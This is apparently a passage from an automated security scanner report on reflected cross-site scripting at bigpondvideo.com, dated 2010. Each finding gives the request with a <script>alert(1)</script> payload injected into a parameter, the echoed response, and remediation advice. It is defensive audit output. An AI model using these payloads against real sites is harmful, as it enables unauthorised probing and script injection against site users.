GET /Web/Flash/carousel?rand=2e768d</script><script>alert(1)</script>30a0539d897 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:09:34 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb306eab7ce&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&rand=2e768d</script><script>alert(1)</script>30a0539d897&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.483. http://bigpondvideo.com/Web/Flash/flash_overlay [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Web/Flash/flash_overlay

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8a82</script><script>alert(1)</script>3699c1a3250 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Web/Flash/flash_overlay?a8a82</script><script>alert(1)</script>3699c1a3250=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:09:37 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb3071e8886&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&a8a82</script><script>alert(1)</script>3699c1a3250=1&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.484. http://bigpondvideo.com/Web/Flash/flash_overlay [rand parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Web/Flash/flash_overlay

Issue detail

The value of the rand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e497c</script><script>alert(1)</script>0cd06a94310 was submitted in the rand parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Web/Flash/flash_overlay?rand=2e497c</script><script>alert(1)</script>0cd06a94310 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:09:30 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb306a81835&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&rand=2e497c</script><script>alert(1)</script>0cd06a94310&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.485. http://bigpondvideo.com/Web/Flash/flash_overlay_all [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Web/Flash/flash_overlay_all

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9d3b</script><script>alert(1)</script>3f4a6c9b743 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Web/Flash/flash_overlay_all?b9d3b</script><script>alert(1)</script>3f4a6c9b743=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:09:23 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb306348452&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&b9d3b</script><script>alert(1)</script>3f4a6c9b743=1&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.486. http://bigpondvideo.com/Web/Flash/flash_overlay_all [rand parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Web/Flash/flash_overlay_all

Issue detail

The value of the rand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b47c3</script><script>alert(1)</script>de52e3e318d was submitted in the rand parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Web/Flash/flash_overlay_all?rand=2b47c3</script><script>alert(1)</script>de52e3e318d HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:09:20 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb3060e87ae&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&rand=2b47c3</script><script>alert(1)</script>de52e3e318d&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.487. http://bigpondvideo.com/Web/Flash/headerFl [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Web/Flash/headerFl

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91605</script><script>alert(1)</script>e33c79e55ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Web/Flash/headerFl?91605</script><script>alert(1)</script>e33c79e55ce=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:09:35 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb307016b80&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&91605</script><script>alert(1)</script>e33c79e55ce=1&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.488. http://bigpondvideo.com/Web/Flash/headerFl [rand parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Web/Flash/headerFl

Issue detail

The value of the rand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b077</script><script>alert(1)</script>aec443b76ed was submitted in the rand parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Web/Flash/headerFl?rand=24b077</script><script>alert(1)</script>aec443b76ed HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:09:29 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb306953bb9&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&rand=24b077</script><script>alert(1)</script>aec443b76ed&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.489. http://bigpondvideo.com/Web/Flash/leaveBehind [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Web/Flash/leaveBehind

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9529e</script><script>alert(1)</script>3120f617ea4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Web/Flash/leaveBehind?9529e</script><script>alert(1)</script>3120f617ea4=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:09:42 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb3076818ce&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&9529e</script><script>alert(1)</script>3120f617ea4=1&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.490. http://bigpondvideo.com/Web/Flash/leaveBehind [rand parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Web/Flash/leaveBehind

Issue detail

The value of the rand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55144</script><script>alert(1)</script>0b3d6cfc56 was submitted in the rand parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Web/Flash/leaveBehind?rand=255144</script><script>alert(1)</script>0b3d6cfc56 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:09:34 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb306eaf4d6&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&rand=255144</script><script>alert(1)</script>0b3d6cfc56&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.491. http://bigpondvideo.com/Web/Flash/main_nav [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Web/Flash/main_nav

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8eded</script><script>alert(1)</script>7927fe1d530 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Web/Flash/main_nav?8eded</script><script>alert(1)</script>7927fe1d530=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:09:31 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb306bf3f56&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&8eded</script><script>alert(1)</script>7927fe1d530=1&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.492. http://bigpondvideo.com/Web/Flash/main_nav [rand parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Web/Flash/main_nav

Issue detail

The value of the rand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b8bd</script><script>alert(1)</script>77b5c290111 was submitted in the rand parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Web/Flash/main_nav?rand=22b8bd</script><script>alert(1)</script>77b5c290111 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:09:27 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb306740a73&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&rand=22b8bd</script><script>alert(1)</script>77b5c290111&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.493. http://bigpondvideo.com/Web/Flash/presentationPlayer [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Web/Flash/presentationPlayer

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb1c2</script><script>alert(1)</script>7eaa5ec3b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Web/Flash/presentationPlayer?eb1c2</script><script>alert(1)</script>7eaa5ec3b9=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:09:40 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb3074949e2&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&eb1c2</script><script>alert(1)</script>7eaa5ec3b9=1&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.494. http://bigpondvideo.com/Web/Flash/presentationPlayer [rand parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Web/Flash/presentationPlayer

Issue detail

The value of the rand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1072c</script><script>alert(1)</script>5624f8a0379 was submitted in the rand parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Web/Flash/presentationPlayer?rand=21072c</script><script>alert(1)</script>5624f8a0379 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:09:35 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb306f16b74&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&rand=21072c</script><script>alert(1)</script>5624f8a0379&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.495. http://bigpondvideo.com/Web/Flash/skyscraperL [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Web/Flash/skyscraperL

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92b3c</script><script>alert(1)</script>39d188c5399 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Web/Flash/skyscraperL?92b3c</script><script>alert(1)</script>39d188c5399=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
